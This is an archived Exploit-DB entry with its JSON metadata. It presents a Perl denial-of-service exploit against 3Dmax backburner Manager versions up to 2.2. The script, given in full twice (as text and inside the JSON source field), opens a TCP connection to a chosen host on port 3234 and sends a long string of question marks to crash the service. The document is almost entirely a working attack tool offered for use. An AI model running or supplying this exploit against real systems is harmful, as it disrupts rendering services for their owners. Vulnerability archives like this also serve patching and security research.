3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit
2004-11-28T00:00:00
ID EDB-ID:662 Type exploitdb Reporter Xtiger Modified 2004-11-28T00:00:00
Description
3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit. Dos exploit for windows platform
#3Dmax backburner Manager Dos Exploit
#There are security hole in 3Dmax backburner Manager Default listen port is 3234.
#It's can be Dos by long string
#Tested on Version
#3dmax 5.0 backburner Manager Version 2.0
#3dmax 6.0 backburner Manager Version 2.2
#3dmax 6.0 SP1 backburner Manager Version 2.2
#All Windows OS
#Found By Xtiger -->www.Xtiger.net&www.ThySea.com
#Code by Xtiger coolsumer@163.com
#Reference: http://jishu.thysea.com/index.php?modules=show&id=10327
----------------------------------------------------------------
#!C:\perl\bin\perl.exe
use IO::Socket;
my $progname = $0;
$progname =~ s,.'*/,,;
$progname =~ s/\.\w*$//;
$host = shift || 'localhost';
$port = shift || '3234';
$title = " =============================================\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\n =============================================\n BY tiger---www.Xtiger.net&www.ThySea.com\n";
$Usage = " Usage: $progname [Host] [port](default is 3234)\n";
if ($host > 0){
dos();
}
else {
usage();
}
sub dos
{
my $socket = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
)
or print "$title [*] ERR-->can't connect to $host:$port! :(\n" and exit;
print ($title, "[*] connected to $host:$port\n");
print "[*] Sending string...\n";
print $socket ("?"x(2364),"\r\n") or die "$title [*] ERR-->Sending string failed! :(\n";
print "[*] maybe crashed!\n";
$socket->close;
}
sub usage
{
die $title,$Usage;
}
# milw0rm.com [2004-11-28]
{"id": "EDB-ID:662", "type": "exploitdb", "bulletinFamily": "exploit", "title": "3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit", "description": "3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit. Dos exploit for windows platform", "published": "2004-11-28T00:00:00", "modified": "2004-11-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/662/", "reporter": "Xtiger", "references": [], "cvelist": [], "lastseen": "2016-01-31T12:37:56", "viewCount": 7, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-01-31T12:37:56", "rev": 2}, "dependencies": {"references": [], "modified": "2016-01-31T12:37:56", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/662/", "sourceData": "#3Dmax backburner Manager Dos Exploit\r\n#There are security hole in 3Dmax backburner Manager Default listen port is 3234.\r\n#It's can be Dos by long string\r\n\r\n#Tested on Version\r\n#3dmax 5.0 backburner Manager Version 2.0\r\n#3dmax 6.0 backburner Manager Version 2.2\r\n#3dmax 6.0 SP1 backburner Manager Version 2.2\r\n#All Windows OS\r\n\r\n#Found By Xtiger -->www.Xtiger.net&www.ThySea.com\r\n#Code by Xtiger coolsumer@163.com\r\n#Reference: http://jishu.thysea.com/index.php?modules=show&id=10327\r\n----------------------------------------------------------------\r\n#!C:\\perl\\bin\\perl.exe\r\n\r\nuse IO::Socket;\r\n\r\nmy $progname = $0;\r\n$progname =~ s,.'*/,,;\r\n$progname =~ s/\\.\\w*$//;\r\n\r\n$host = shift || 'localhost';\r\n$port = shift || '3234';\r\n$title = \" =============================================\\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\\n =============================================\\n BY tiger---www.Xtiger.net&www.ThySea.com\\n\";\r\n$Usage = \" Usage: $progname [Host] [port](default is 3234)\\n\";\r\n\r\nif ($host > 0){\r\n dos();\r\n}\r\nelse {\r\n usage();\r\n}\r\n\r\nsub dos\r\n{\r\nmy $socket = IO::Socket::INET->new ( Proto => \"tcp\",\r\nPeerAddr => $host,\r\nPeerPort => $port,\r\n)\r\nor print \"$title [*] ERR-->can't connect to $host:$port! :(\\n\" and exit;\r\nprint ($title, \"[*] connected to $host:$port\\n\");\r\nprint \"[*] Sending string...\\n\";\r\n\r\nprint $socket (\"?\"x(2364),\"\\r\\n\") or die \"$title [*] ERR-->Sending string failed! :(\\n\";\r\nprint \"[*] maybe crashed!\\n\";\r\n\r\n$socket->close;\r\n}\r\n\r\nsub usage\r\n{\r\n die $title,$Usage;\r\n}\n\n# milw0rm.com [2004-11-28]\n", "osvdbidlist": ["63258"]}